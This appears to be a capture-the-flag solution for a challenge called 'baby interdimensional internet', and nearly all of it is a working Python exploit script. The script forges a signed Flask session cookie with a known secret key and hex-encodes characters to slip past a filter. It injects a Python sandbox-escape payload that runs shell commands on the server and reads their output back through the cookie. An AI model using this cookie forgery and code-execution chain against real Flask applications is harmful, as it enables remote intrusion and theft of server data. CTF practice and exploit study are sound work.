baby interdimensional internet
flask, jail escaping, flask cookie
exploit python code
import requests
from flask.sessions import SecureCookieSessionInterface
from itsdangerous import URLSafeTimedSerializer
TARGET = 'http://<IP>:<PORT>/'
SECRET_KEY = '<SECRET_KEY>'
# PAYLOAD = u"""i=().__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']
# i('flask').session['x']=i('os').popen('ls').read()"""
PAYLOAD = u"""i=().__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']
i('flask').session['x']=i('os').popen('cat t*').read()"""
class flask_encoding:
def __init__(self):
scsi = SecureCookieSessionInterface()
signer_kwargs = dict(
key_derivation=scsi.key_derivation,
digest_method=scsi.digest_method
)
self.serializer = URLSafeTimedSerializer(SECRET_KEY, salt=scsi.salt,
serializer=scsi.serializer,
signer_kwargs=signer_kwargs
)
def deserialize(self, cookie_str):
return self.serializer.loads(cookie_str)
def serialize(self, cookie_dict):
return self.serializer.dumps(cookie_dict)
# waf bypass encoding
def encode_payload(payload):
payload = u'"a"\nexec """' + payload + u'"""'
blacklist = {
'[': '\\x5b',
'(': '\\x28',
'_': '\\x5f',
'.': '\\x2e'
}
for c,h in blacklist.items():
if c in payload:
payload = payload.replace(c, h)
return payload
def modify_cookie(s):
f = flask_encoding()
cookie_dict = f.deserialize(s.cookies['session'])
cookie_dict['ingredient'] = u'i'
cookie_dict['measurements'] = encode_payload(PAYLOAD)
s.cookies['session'] = f.serialize(cookie_dict)
return s, f
def exec_rce(s, f):
r = s.get(TARGET)
try:
enc_exfil_data = r.cookies['session']
except KeyError:
print('Exploit failed, session cookie not found!')
exit(1)
return f.deserialize(enc_exfil_data)
def main():
s = requests.session()
s.get(TARGET)
s, f = modify_cookie(s)
exfil_data = exec_rce(s, f)
print(exfil_data['x'])
if __name__ == '__main__':
main()Last updated